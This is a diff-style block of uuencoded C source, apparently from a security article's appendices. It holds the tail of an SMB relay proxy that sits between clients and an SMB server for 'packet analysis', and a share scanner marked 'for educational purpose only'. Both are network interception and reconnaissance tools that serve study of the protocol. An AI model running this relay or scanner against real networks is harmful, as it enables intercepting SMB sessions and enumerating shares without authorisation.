+M#0H@(`T*("!C87-E("=N)R`Z#0H@(%-M8E-E<G9E<BYS:6Y?<&]R="`](&AT
+M;VYS*%--0E]03U)4*3L-"B`@8G)E86L[#0H-"B`@9&5F875L="`Z#0H@('!R
+M:6YT9B@B7&Y0;&5A<V4@86YS=V5R(&)Y('D@;W(@;B!F;W(@=&AE('=I;C)K
+M+UA0('-U<'!O<G1<;B(I.PT*("!R971U<FX@,#L@#0H@?0T*(`T*(%-M8E-E
+M<G9E<BYS:6Y?9F%M:6QY(#T@049?24Y%5#L-"B!3;V-K4VUB4V5R=F5R(#T@
+M<V]C:V5T*$%&7TE.150L4T]#2U]35%)%04TL-BD[#0H-"B!0<F]X>2YS:6Y?
+M9F%M:6QY(#T@049?24Y%5#L-"B!0<F]X>2YS:6Y?<&]R="`](&AT;VYS*$QI
+M<W1E;E!O<G0I.R`-"B!0<F]X>2YS:6Y?861D<BYS7V%D9'(]:'1O;FPH24Y!
+M1$127T%.62D[#0H@#0H@4V]C:U!R;WAY(#T@<V]C:V5T*$%&7TE.150L4T]#
+M2U]35%)%04TL-BD[#0H@#0HO*E-T87)T('1O(&QI<W1E;B!F;W(@:6YC;VUI
+M;F<@8V]N;FYE>&EO;BHO#0H@#0H@8FEN9"@-"B`@("`@(%-O8VM0<F]X>2P-
+M"B`@("`@("AS=')U8W0@<V]C:V%D9'(@*BD@*"90<F]X>2DL#0H@("`@("!S
+M:7IE;V8H<W1R=6-T('-O8VMA9&1R7VEN*0T*("`@("`@*3L-"@T*(&QI<W1E
+M;BA3;V-K4')O>'DL,2D[#0H-"B!#;W5N="`]('-I>F5O9BAS=')U8W0@<V]C
+M:V%D9')?:6XI.PT*#0H@4V]C:U!R;WAY(#T@86-C97!T*`T*("`@("`@("`@
+M("`@("`@("`@("!3;V-K4')O>'DL#0H@("`@("`@("`@("`@("`@("`@("AS
+M=')U8W0@<V]C:V%D9'(@*BD@*"90<F]X>2DL#0H@("`@("`@("`@("`@("`@
+M("`@("AI;G0@*BD@*"9#;W5N="D-"B`@("`@("`@("`@("`@("`@("`I.PT*
+M#0H@8V]N;F5C="@-"B`@("`@("`@(%-O8VM3;6)397)V97(L#0H@("`@("`@
+M("`H<W1R=6-T('-O8VMA9&1R("HI("@F4VUB4V5R=F5R*2P-"B`@("`@("`@
+M('-I>F5O9BAS=')U8W0@<V]C:V%D9')?:6XI#0H@("`@("`@("D[#0H@#0HO
+M*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*E!!0TM%5"!!3D%,65-)4RHJ*BHJ
+M*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*B\-"@T*(&EF*$-H;VEC92`]/2`G>2<I
+M#0H@>PD@#0H@("\J8V]N;F5X:6]N(&]N('!O<G0@-#0U*B\-"B`-"B`@5VEN
+M,FM84%-U<'!O<G0H4V]C:U!R;WAY+%-O8VM3;6)397)V97(I.PT*('T-"B!E
+M;'-E#0H@>PT*("`O*DYO<FUA;"!C;VYN97AI;VX@;VX@<&]R="`Q,SDJ+PT*
+M(`T*("!.;W)M86PH4V]C:U!R;WAY+%-O8VM3;6)397)V97(I.PT*('T-"B`-
+M"B!C;&]S92A3;V-K4VUB4V5R=F5R*3L-"B!C;&]S92A3;V-K4')O>'DI.PT*
+M(`T*(')E='5R;B`P.PT*?2`-"B`@#0H-"@T*#0HO*BHJ*BHJ*BHJ*BHJ*BHJ
+M*BHJ*BHJ*BHJ*BHJ*BHJ5$A%($5.1"HJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ
+M*BHJ*BHJ*BHO("`-"@T*#0H-"B\J*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ
+M*BHJ*BHJ*BI#550@2$5212HJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ
+M*BHO#0H-"BTM6R`@07!P96YD:7@@0B`-"@T*66]U(&AA=F4@:6X@=&AI<R!P
+M87)T('1H92!S;W5R8V4@;V8@=&AE('!R;V=R86T@=7-E('1O('-C86X@4TU"
+M('-H87)E<RX-"@T*4F5A9"!T:&4@<V]U<F-E+B!9;W4@=VEL;"!F:6YD(&$@
+M;&]T(&$@:6YT97)E<W1I;F<@=&AI;F=S(&%B;W5T(%--0BX-"@T*268@>6]U
+M('=A;G0@=&\@8V]M<&EL92!I="P@=&AE(&-O;6UA;F0@:7,@(F=C8R!S8V%N
+M7W-H87)E+F,@+6\@4TU"<V-A;B(N#0H-"DEF('EO=2!W86YT('1O('5S92!I
+M="`Z(%--0G-C86X@+7,@(G-E<G9E<B!)4"(@+6X@(EEO=7(@;F5T8FEO<R!N
+M86UE(BX-"@T*(G-E<G9E<B!)4"(@:7,@=&AE($E0(&%D9')E<W,@;V8@=&AE
+M(%--0B!S97)V97(N#0H-"B)9;W5R(&YE=&)I;W,@;F%M92(@<W1R:6YG(&ES
+M('=H870@>6]U('=A;G0N("AL97-S('1H86X@,34@8VAA<F%C=&5R<RD-"@T*
+M4W5C8V5S<V9U;&QY('1E<W1E9"!W:71H('-A;6)A('-E<G9E<B`R+C`@+@T*
+M#0I9;W4@<VAO=6QD;B=T('5S92!I="!O;B!T:&4@;&]O<&)A8VL@:6YT97)F
+M86-E+@T*#0I4:&ES('!R;V=R86T@9&]E<VXG="!S=7!P;W)T(%5.24-/1$4@
+M<W1R:6YG<RX-"@T*#0HO*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ
+M*BHJ0U54($A%4D4J*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ+PT*
+M+RHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ
+M*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*@T*("`@("`@("`@("`@("`@("`@
+M("`@("`@(%--0B!30T%.(%)%34]412!32$%215,-"@D)("`@("`@("`@("`@
+M0V]D960@8GD@;&5D:6X-"B`@("`@("`@("`@("`@("`@("`@("`@;&5D:6Y`
+M96YC97!H86QO;BUZ97)O+F-O;0T*("`@("`@("`@("`@("`@("`@("`@($9O
+M<B!E9'5C871I;VYA;"!P=7)P;W-E(&]N;'D@(0T**BHJ*BHJ*BHJ*BHJ*BHJ
+M*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ
+M*BHJ*BHJ*BHJ+PT*#0HC:6YC;'5D92`\<W1D:6\N:#X-"B-I;F-L=61E(#QS
+M=')I;F<N:#X-"B-I;F-L=61E(#QS=&1L:6(N:#X-"B-I;F-L=61E(#QU;FES
+M=&0N:#X-"B-I;F-L=61E(#QE<G)N;RYH/@T*(VEN8VQU9&4@/'-I9VYA;"YH
+M/@T*(VEN8VQU9&4@/'-Y<R]I;V-T;"YH/@T*(VEN8VQU9&4@/'-Y<R]T:6UE
+M+F@^#0HC:6YC;'5D92`\<WES+W=A:70N:#X-"B-I;F-L=61E(#QS>7,O<W1A
+M="YH/@T*#0HC:6YC;'5D92`\;F5T+VEF+F@^#0HC:6YC;'5D92`\<WES+W-O
+M8VME="YH/@T*(VEN8VQU9&4@/&%R<&$O:6YE="YH/@T*#0HC:6YC;'5D92`\
+M;F5T:6YE="]I<"YH/@T*(VEN8VQU9&4@/&YE=&EN970O:6XN:#X-"B-I;F-L
+M=61E(#QN971I;F5T+W1C<"YH/@T*(VEN8VQU9&4@/&YE=&EN970O=61P+F@^
+M#0HC:6YC;'5D92`\;F5T:6YE="]I9E]E=&AE<BYH/@T*#0HC:6YC;'5D92`\
+M;&EB;F5T+F@^#0HC:6YC;'5D92`\<&-A<"YH/@T*#0HC9&5F:6YE(%--0E]0
+M3U)4"3$S.0T*#0HC9&5F:6YE"75?:6YT.%]T"75N<VEG;F5D(&-H87(-"@T*
+M(V1E9FEN90EU7VEN=#$V7W0)=6YS:6=N960@<VAO<G0-"@T*(V1E9FEN90EU
+M7VEN=#,R7W0)=6YS:6=N960@:6YT(`T*#0HC9&5F:6YE"75C:&%R"75N<VEG
+M;F5D(&-H87(@#0H-"B-D969I;F4)=5]C:&%R"75N<VEG;F5D(&-H87(-"@T*
+M(V1E9FEN90E334)?4%)/5$]#3TQ3"2)<>#4P7'@T,UQX,C!<>#1E7`T*7'@T
+M-5QX-31<>#4W7'@T9EQX-3)<>#1B7'@R,%QX-3!<>#4R7'@T9EQX-#=<>#4R
+M7'@T,5QX-&1<>#(P7'@S,5P-"EQX,F5<>#,P7'@P,%QX,#)<>#1D7'@T.5QX
+M-#-<>#4R7'@T9EQX-3-<>#1F7'@T-EQX-31<>#(P7'@T95QX-#5<#0I<>#4T
+M7'@U-UQX-&9<>#4R7'@T8EQX-3-<>#(P7'@S,5QX,F5<>#,P7'@S,UQX,#!<
+M>#`R7'@T9%QX-#E<>#0S7`T*7'@U,EQX-&9<>#4S7'@T9EQX-#9<>#4T7'@R
+M,%QX-&5<>#0U7'@U-%QX-3=<>#1F7'@U,EQX-&)<>#4S7'@R,%P-"EQX,S-<
+M>#)E7'@S,%QX,#!<>#`R7'@T8UQX-#%<>#1E7'@T9%QX-#%<>#1E7'@S,5QX
+M,F5<>#,P7'@P,%QX,#)<#0I<>#1C7'@T9%QX,S%<>#)E7'@S,EQX-3A<>#,P
+M7'@S,%QX,S)<>#`P7'@P,EQX-3-<>#8Q7'@V9%QX-C)<>#8Q7`T*7'@P,%QX
+M,#)<>#1E7'@U-%QX,C!<>#1C7'@T,5QX-&5<>#1D7'@T,5QX-&5<>#(P7'@S
+M,5QX,F5<>#,P7'@P,%P-"EQX,#)<>#1E7'@U-%QX,C!<>#1C7'@T9%QX,C!<
+M>#,P7'@R95QX,S%<>#,R(B`@("`@("`@("`)#0H-"B\J5&AE(&YA=&EV92!O
+M<R!A;F0@;&%N;6%N(&-L:65N="P@9F]R('5S(#H@56YI>"Y386UB82HO#0H-
+M"B-D969I;F4@3D%4259%7T]37TQ!3DU!3@DB7'@U-5QX-F5<>#8Y7'@W.%QX
+M,#!<>#4S7'@V,5QX-F1<#0I<>#8R7'@V,2(-"@T*+RI4:&4@0V]M;6%N9"!F
+M;W(@=&-O;G@@<V-A;FYI;F<@.B`B/S\_/S\B*B\-"@T*(V1E9FEN92!40T].
+M6%]#3TU-04Y$(")<>#0Y7'@U,%QX-#-<>#(T7'@P,%QX,V9<>#-F7'@S9EQX
+M,V9<>#-F(B`-"@T*#0HO*E1H92!205`@8V]M;6%N9"!A;F0@=&AE(%Q0:7!E
+M7&QA;FUA;B!S=')I;F<J+PT*#0HC9&5F:6YE($Y!345?4D%07T-/34U!3D0)
+M(EQX-6-<>#4P7'@T.5QX-3!<>#0U7'@U8UQX-&-<>#0Q7'@T95P-"EQX-&1<
+M>#0Q7'@T95QX,#!<>#`P7'@P,%QX-3=<>#<R7'@T8UQX-C5<>#8X7'@P,%QX
+M-#)<>#,Q7'@S,UQX-#)<>#4W7`T*7'@W85QX,#!<>#`Q7'@P,%QX9F9<>&9F
+M(@T*+RHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ
+M*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*@T*("`@("`@("`@("`@("`@
+M("`@("`@("`@("`@("!35%)50U154D53#0HJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ
+M*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ
+M*BHJ*BHO"0D)("`@("`-"G1Y<&5D968@<W1R=6-T#0I[#0H@=5]I;G0X7W0@
+M4')O=&]C;VQ;-%T["2\J0V]N=&%I;G,@,'A&1BPG4TU")RHO#0H@=5]I;G0X
+M7W0@0V]M;6%N9#L)+RI#;VUM86YD($-O9&4J+PT*('5N:6]N(`T*('L-"B`@
+M<W1R=6-T#0H@('L-"B`@('5?:6YT.%]T($5R<F]R0VQA<W,["2\J17)R;W(@
+M0VQA<W,J+PT*("`@=5]I;G0X7W0@4F5S97)V960["2\J4F5S97)V960@9F]R
+M(&9U='5R92!U<V4J+R`-"B`@('5?:6YT.%]T($5R<F]R6S)=.PDO*D5R<F]R
+M($-O9&4J+PT*("!]($1O<T5R<F]R.PT*("!U7VEN=#A?="!3=&%T=7-;-%T[
+M"2\J,S(M8FET<R!E<G)O<B!C;V1E*B\-"B!](%-T871U<R`[#0H@=5]I;G0X
+M7W0@1FQA9W,["2\J1FQA9W,J+PT*('5?:6YT.%]T($9L86=S,ELR73L)+RI-
+M;W)E($9L86=S*B\-"B!U;FEO;@T*('L-"B`@=5]I;G0X7W0@4&%D6S$R73L-
+M"B`@<W1R=6-T#0H@('L-"B`@('5?:6YT.%]T(%!I9$AI9VA;,ET["2\J2&EG
+M:"!087)T(&]F('1H92!0:60J+PT*("`@=5]I;G0X7W0@56YU<V5D6S1=.PDO
+M*DYO="!5<V5D*B\-"B`@('5?:6YT.%]T(%5N=7-E9#);-%T["2\J3F]T(%5S
+M960J+PT*("!]($5X=')A.PT*('T@4&%D17AT<F$[#0H@=5]I;G0X7W0@5&ED
+M6S)=.PDO*E1R964@261E;G1I9FEE<BHO#0H@=5]I;G0X7W0@4&ED6S)=.PDO
+M*D-A;&QE<B=S('!R;V-E<W,@240J+PT*('5?:6YT.%]T(%5I9%LR73L)+RI5
+M;F%U=&AE;G1I8V%T960@=7-E<B!)1"HO#0H@=5]I;G0X7W0@36ED6S)=.PDO
+M*DUU;'1I<&QE>"!)9"HO#0I](%-M8D)A<V5(9'(@.PT*#0IT>7!E9&5F('-T
+M<G5C="`-"GL-"B!U7VEN=#A?="!7;W)D0V]U;G0[+RI#;W5N="!O9B!P87)A
+M;65T97(@=V]R9',@/3$W*B\-"B!U7VEN=#A?="!$:6%L96-T26YD97A;,ET[
+M+RI);F1E>"!O9B!S96QE8W1E9"!D:6%L96-T*B\-"B!U7VEN=#A?="!396-U
+M<FET>4UO9&4["2\J4V5C=7)I='D@36]D92`Z*B\-"@D)"2\J8FET(#`@.B`P
+M/7-H87)E+"`Q/75S97(J+PT*"0D)+RIB:70@,2`Z(#$]96YC<GEP="!P87-S
+M=V]R9',J+PT*('5?:6YT.%]T($UA>$UP>$-O=6YT6S)=.R\J36%X(%!E;F1I
+M;F<@;75L=&EP;&5X960@<F5Q=65S="HO#0H@=5]I;G0X7W0@36%X3G5M8F5R
+M<U9C<ULR73LO*DUA>"!60W,@8F5T=V5E96X@8VQI96YT(&%N9"!S97)V97(J
+M+PT*('5?:6YT.%]T($UA>$)U9F9E<E-I>F5;-%T[+RI-87@@=')A;G-M:70@
+M8G5F9F5R('-I>F4J+PT*('5?:6YT.%]T($UA>%)A=U-I>F5;-%T[+RI-87@@
+M<F%W(&)U9F9E<B!S:7IE*B\-"B!U7VEN=#A?="!397-S:6]N2V5Y6S1=.R\J
+M56YI<75E('1O:V5N(&ED96YT:69Y:6YG('1H:7,@<V5S<VEO;BHO#0H@=5]I
+M;G0X7W0@0V%P86)I;&ET:65S6S1=.R\J4V5R=F5R($-A<&%B:6QI=&EE<RHO
+M#0H@=5]I;G0X7W0@4WES=&5M5&EM94QO=ULT73LO*E-Y<W1E;2`H551#*2!T
+M:6UE(&]F('1H92!S97)V97(@*&QO=RDJ+PT*('5?:6YT.%]T(%-Y<W1E;51I
+M;65(:6=H6S1=.R\J4WES=&5M("A55$,I('1I;64@;V8@=&AE('-E<G9E<B`H
+M:&EG:"DJ+PT*('5?:6YT.%]T(%-E<G9E<E1I;65:;VYE6S)=.R\J5&EM92!Z
+M;VYE(&]F('-E<G9E<B`H;6EN(&9R;VT@551#*2HO#0H@=5]I;G0X7W0@16YC
+M<GEP=&EO;DME>4QE;F=T:#LO*DQE;F=T:"!O9B!E;F-R>7!T:6]N($ME>2HO
+M#0H@=5]I;G0X7W0@0GET94-O=6YT6S)=.PDO*D-O=6YT(&]F(&1A=&$@8GET
+M97,J+PT*?2!3;6).96=0<F]T4F5P;'E(9'([(`T*#0IT>7!E9&5F('-T<G5C
+M="`-"GL-"B!U7VEN=#A?="!7;W)D0V]U;G0[#0H@=5]I;G0X7W0@0GET94-O
+M=6YT6S)=.PT*('5?:6YT.%]T($)U9F9E<D9O<FUA=#L-"GT@4VUB3F5G4')O
+M=%)E<75E<W1(9'([(`T*#0H-"G1Y<&5D968@<W1R=6-T#0I[#0H@=5]I;G0X
+M7W0@5V]R9$-O=6YT.R\J0V]U;G0@;V8@<&%R86UE=&5R('=O<F1S/3$S("AR
+M97%U97-T*2HO#0H@=5]I;G0X7W0@06YD6$-O;6UA;F0[+RIS96-O;F1A<GD@
+M*%@I(&-O;6UA;F0L,'A&1B`](&YO;F4J+PT*('5?:6YT.%]T($%N9%A297-E
+M<G9E9#LO*G)E<V5R=F5D("AM=7-T(&)E('IE<F\I*B\-"B!U7VEN=#A?="!!
+M;F183V9F<V5T6S)=.R\J;V9F<V5T('1O(&YE>'0@8V]M;6%N9"!7;W)D8V]U
+M;G0J+PT*('5?:6YT.%]T($UA>$)U9F9E<E-I>F5;,ET[+RI#;&EE;G0G<R!M
+M87AI;75N(&)U9F9E<B!S:7IE*B\-"B!U7VEN=#A?="!-87A-<'A#;W5N=%LR
+M73LO*F%C='5A;"!M87AI;75N(&UU;'1I<&QE>&5D('!E;F1I;F<@<F5Q=65S
+M="HO#0H@=5]I;G0X7W0@5F-.=6UB97);,ET[+RHP/69I<G-T("AO;FQY*2P@
+M;F]N>F5R;RUA9&1I=&EO;F%L(%9#(&YU;6)E<BHO#0H@=5]I;G0X7W0@4V5S
+M<VEO;DME>5LT73LO*G-E<W-I;VX@:V5Y("AV86QI9"!O;FQY(&EF('-M8E]V
+M8U]M=6XA/3`J+PT*('5?:6YT.%]T($-A<V5);G-E;G-I=&EV95!A<W-W;W)D
+M3&5N9W1H6S)=.R`O*D%.4TD@<&%S<W=O<F0@<VEZ92HO#0H@=5]I;G0X7W0@
+M0V%S95-E;G-I=&EV95!A<W-W;W)D3&5N9W1H6S)=.R`O*E5.24-/1$4@<&%S
+M<W=O<F0@<VEZ92HO#0H@=5]I;G0X7W0@4F5S97)V961;-%T["2\J<F5S97)V
+M960@*&UU<W0@8F4@,"DJ+PT*('5?:6YT.%]T($-A<&%B:6QI=&EE<ULT73LO
+M*F-L:65N="!C87!A8FEL:71I97,J+PT*('5?:6YT.%]T($)Y=&5#;W5N=%LR
+M73L)+RI#;W5N="!O9B!D871A(&)Y=&5S.VUI;CTP*B\-"GT@4VUB4V5T=7!8
+M4F5Q=65S=$AD<B`[#0H-"G1Y<&5D968@<W1R=6-T#0I[#0H@=5]I;G0X7W0@
+M5V]R9$-O=6YT.PDO*G9A;'5E/30@*B\-"B!U7VEN=#A?="!!;F180V]M;6%N
+M9#L)+RIS96-O;F1A<GD@*%@I(&-O;6UA;F0L,'A&1B`](&YO;F4J+PT*('5?
+M:6YT.%]T($%N9%A297-E<G9E9#L)+RIR97-E<G9E9"`H;75S="!B92!Z97)O
+M*2HO#0H@=5]I;G0X7W0@06YD6$]F9G-E=%LR73LO*F]F9G-E="`H9G)O;2!3
+M34(@:&1R('-T87)T('1O(&YE>'0@8VUD("HO#0H@=5]I;G0X7W0@1FQA9W-;
+M,ET[+RI!9&1I=&EO;F%L(&EN9F]R;6%T:6]N(&)I="`P('-E=#UD:7-C;VYN
+M96-T(%1I9"`J+PT*('5?:6YT.%]T(%!A<W-W;W)D3&5N9W1H6S)=.PDO*DQE
+M;F=T:"!O9B!P87-S=V]R9"HO#0H@=5]I;G0X7W0@0GET94-O=6YT6S)=.PDO
+M*D-O=6YT(&]F(&1A=&$@8GET97,@.R!M:6X],RHO#0I](%-M8E1C;VY84F5Q
+M=65S=$AD<B`[#0H-"G1Y<&5D968@<W1R=6-T#0I[#0H@=5]I;G0X7W0@5V]R
+M9$-O=6YT.R\J0V]U;G0@;V8@<&%R86UE=&5R('=O<F1S/3!X,RHO#0H@=5]I
+M;G0X7W0@06YD6$-O;6UA;F0[+RI396-O;F1A<GD@*%@I(&-O;6UA;F0[(#!X
+M1D8];F]N92HO#0H@=5]I;G0X7W0@06YD6%)E<V5R=F5D6S)=.R\J4F5S97)V
+M960@*&UU<W0@8F4@>F5R;RDJ+PT*('5?:6YT.%]T($]P=&EO;F%L4W5P<&]R
+M=%LR73LO*D]P=&EO;F%L(%-U<'!O<G0@8FET<RHO#0H@=5]I;G0X7W0@0GET
+M94-O=6YT6S)=.PDO*D-O=6YT(&]F(&1A=&$@8GET97,J+PT*?2!3;6)48V]N
+M6%)E<&QY2&1R.PT*("`-"G1Y<&5D968@<W1R=6-T#0I[#0H@=5]I;G0X7W0@
+M5V]R9$-O=6YT.R\J0V]U;G0@;V8@<&%R86UE=&5R('=O<F0L('9A;'5E/3$T
+M*U-E='5P0V]U;G0J+PT*('5?:6YT.%]T(%1O=&%L4&%R86UE=&5R0V]U;G1;
+M,ET[("\J5&]T86P@<&%R86UE=&5R(&)E:6YG('-E;G0J+PT*('5?:6YT.%]T
+M(%1O=&%L1&%T84-O=6YT6S)=.PDO*E1O=&%L($1A=&$@8GET97,@8F5I;F<@
+M<V5N="HO#0H@=5]I;G0X7W0@36%X4&%R86UE=&5R0V]U;G1;,ET["2\J36%X
+M(%!A<F%M971E<B!B>71E<R!T;R!R971U<FXJ+PT*('5?:6YT.%]T($UA>$1A
+M=&%#;W5N=%LR73L)+RI-87@@1&%T82!B>71E<R!T;R!R971U<FXJ+PT*('5?
+M:6YT.%]T($UA>%-E='5P0V]U;G0["2\J36%X('-E='5P('=O<F1S('1O(')E
+M='5R;BHO#0H@=5]I;G0X7W0@4F5S97)V960[#0H@=5]I;G0X7W0@1FQA9W-;
+M,ET[#0H@=5]I;G0X7W0@5&EM96]U=%LT73L-"B!U7VEN=#A?="!297-E<G9E
+M9#);,ET[#0H@=5]I;G0X7W0@4&%R86UE=&5R0V]U;G1;,ET[+RI087)A;65T
+M97(@8GET97,@<V5N="!I;B!T:&ES('!A8VME="HO#0H@=5]I;G0X7W0@4&%R
+M86UE=&5R3V9F<V5T6S)=.R\J3V9F<V5T('1O('!A<F%M971E<BHO#0H@=5]I
+M;G0X7W0@1&%T84-O=6YT6S)=.PDO*D1A=&$@8GET97,@<V5N="!I;B!T:&ES
+M('!A8VME="HO#0H@=5]I;G0X7W0@1&%T84]F9G-E=%LR73LO*D]F9G-E="!T
+M;R!D871A*B\-"B!U7VEN=#A?="!3971U<$-O=6YT.R\J0V]U;G0@;V8@<V5T
+M=7`@=V]R9',J+PT*('5?:6YT.%]T(%)E<V5R=F5D,SLO*E5S92!T;R!P860@
+M=&\@=V]R9"HO#0H@=5]I;G0X7W0@0GET94-O=6YT6S)=.PDO*E-E='5P8V]U
+M;G0@/2`P('-O('=E(&-A;B!D;R!T:&ES*B\-"GT@4VUB5')A;G-297%U97-T
+M2&1R.PT*(`T*#0IT>7!E9&5F('-T<G5C=`T*>PT*('5?:6YT.%]T(%=O<F1#
+M;W5N=#LO*D-O=6YT(&]F('!A<F%M971E<B!W;W)D+"!V86QU93TQ-"M3971U
+M<$-O=6YT*B\-"B!U7VEN=#A?="!4;W1A;%!A<F%M971E<D-O=6YT6S)=.R\J
+M5&]T86P@<&%R86UE=&5R(&)E:6YG('-E;G0J+PT*('5?:6YT.%]T(%1O=&%L
+M1&%T84-O=6YT6S)=.R\J5&]T86P@1&%T82!B>71E<R!B96EN9R!S96YT*B\-
+M"B!U7VEN=#A?="!297-E<G9E9%LR73L-"B!U7VEN=#A?="!087)A;65T97)#
+M;W5N=%LR73LO*E!A<F%M971E<B!B>71E<R!S96YT(&EN('1H:7,@<&%C:V5T
+M*B\-"B!U7VEN=#A?="!087)A;65T97)/9F9S971;,ET[+RI/9F9S970@=&\@
+M<&%R86UE=&5R<RHO#0H@=5]I;G0X7W0@4&%R86UE=&5R1&ES<&QA8V5M96YT
+M6S)=.R\J1&ES<&QA8V5M96YT(&]F('!A<F%M971E<B!B>71E<RHO#0H@=5]I
+M;G0X7W0@1&%T84-O=6YT6S)=.R\J1&%T82!B>71E<R!S96YT(&EN('1H:7,@
+M<&%C:V5T*B\-"B!U7VEN=#A?="!$871A3V9F<V5T6S)=.R\J3V9F<V5T('1O
+M(&1A=&$J+PT*('5?:6YT.%]T($1A=&%$:7-P;&%C96UE;G1;,ET[+RI$:7-P
+M;&%C96UE;G0@;V8@9&%T82!B>71E<RHO#0H@=5]I;G0X7W0@4V5T=7!#;W5N
+M=#LO*D-O=6YT(&]F('-E='5P('=O<F1S*B\-"B!U7VEN=#A?="!297-E<G9E
+M9#([+RI5<V4@=&\@<&%D('1O('=O<F0J+PT*('5?:6YT.%]T($)Y=&5#;W5N
+M=%LR73LO*E-E='5P8V]U;G0@/2`P('-O('=E(&-A;B!D;R!T:&ES*B\-"GT@
+M4VUB5')A;G-297!L>4AD<CL-"B`-"G1Y<&5D968@<W1R=6-T#0I[#0H@=5]I
+M;G0X7W0@5'EP93L)+RIT>7!E*B\)#0H@=5]I;G0X7W0@1FQA9W,[+RIF;&%G
+M<RHO#0H@=5]I;G0Q-E]T($QE;F=T:#LO*FQE;F=T:"!O9B!T:&4@3D)4('-E
+M<W-I;VX@<&%C:V5T*B\-"GT@3F)T4V5S<VEO;DAD<CL-"@T*+RHJ*BHJ*BHJ
+M*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ
+M*BHJ*BHJ*BHJ*BHJ*BHJ*@T*("`@("`@("`@("`@("`@("`@("`@("`@("`@
+M($953D-424].4PT**BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ
+M*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ+PT*=F]I9"!3
+M96YD3F5T0FEO<TYA;65297%U97-T*&EN="P@8VAA<B`J+"!C:&%R("HI.PT*
+M#0IV;VED(%-E;F1.96=0<F]T4F5Q=65S="AI;G0I.PT*#0IC:&%R("I296-E
+M:79E3F5G4')O=%)E<&QY*&EN="P@:6YT("HI.PT*#0IV;VED(%-E;F13971U
+M<%A297%U97-T*&EN="P@:6YT("QC:&%R("HI.PT*#0IV;VED(%-E;F148V]N
+M6%)E<75E<W0H:6YT+"!U7V-H87(@*BD[#0H-"G9O:60@4F5C96EV951C;VY8
+M4F5P;'DH:6YT+"!U7VEN=#A?="`J*3L-"@T*=F]I9"!396YD5')A;G-297%U
+M97-T*&EN="P@=5]I;G0X7W0@*BD[#0H-"G9O:60@4F5C96EV951R86YS4F5P
+M;'DH:6YT*3L-"B\J*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ
+M*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BH-"B`@("`@("`@
+M("`@("`@("`@("`@("`@("`@("`@5$A%($-/1$4-"BHJ*BHJ*BHJ*BHJ*BHJ
+M*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ*BHJ
+M*BHJ*BHJ*BHJ*B\-"@T*+RI4:&ES('-O=7)C92!C;V1E(&-O;G1A:6YS(&%L
+M;"!T:&4@<')O=&]T>7!E<R!A;F0@#0H@*B!D969I;FET:6]N<R!O9B!T:&4@
+M9G5N8W1I;VYS('1H870@87)E('5S960-"B`J('1O(&)U:6QD(&$@4TU"(&)A
+M<V4@:&5A9&5R+"!.151"24]3(&AE861E<@T*("H@86YD('1O(&5N8V]D92!A
+M($Y%5$))3U,@;F%M92`J+PT*#0H-"B\J5&\@8G5I;&0@82!.151"24]3(%-E
+M<W-I;VX@2&5A9&5R*B\-"@T*=F]I9"!"=6EL9$YB="@-"B`@("`@("`@("`@
+M("`@+RI/=7(@<&%C:V5T*B\-"B`@("`@("`@("`@("`@=5]C:&%R("I086-K
+M970L#0H@("`@("`@("`@("`@("\J($)Y=&4@8V]U;G0@;V8@9&%T82`-"B`@
+M("`@("`@("`@("`@("H@*'=H870@:7,@;W9E<B!T:&4@;F5T8FEO<R!H96%D
+M97(I*B\@("`@("`-"B`@("`@("`@("`@("`@:6YT(%!A8VME=$QE;F=T:"D@
+M#0I[#0H@3F)T4V5S<VEO;DAD<B`J3F)T4V5S<VEO;CL-"@T*+RI#;&5A;B!T
+M:&4@<&%C:V5T*B\-"@T*(&UE;7-E="A086-K970L,"Q086-K971,96YG=&@K
+M<VEZ96]F*$YB=%-E<W-I;VY(9'(I*3L-"@T*($YB=%-E<W-I;VX@/2`H3F)T
+M4V5S<VEO;DAD<B`J*2`H4&%C:V5T*3L-"@T*("\J(E1Y<&4B(#T@,'@P,"!A
+M;F0@(D9L86=S(B`](#!X,#`L(`T*("`J(&)E8V%U<V4@=V4@=7-E(&$@<V5S
+M<VEO;B!M97-S86=E('!A8VME=`T*("`J('=I=&@@3D540DE/4RP-"B`@*B`B
+M3&5N9W1H(B!I<R!E<75A;"!T;R!T:&4-"B`@*B!A;6]U;G0@;V8@9&%T82!O
+M=F5R('1H92`-"B`@*B!.151"24]3(&AE861E<BHO#0H-"@T*($YB=%-E<W-I
+M;VXM/E1Y<&4],'@P.PT*#0H@3F)T4V5S<VEO;BT^1FQA9W,],'@P.PT*#0H@
+M3F)T4V5S<VEO;BT^3&5N9W1H/6AT;VYS*%!A8VME=$QE;F=T:"D[#0I]#0H-
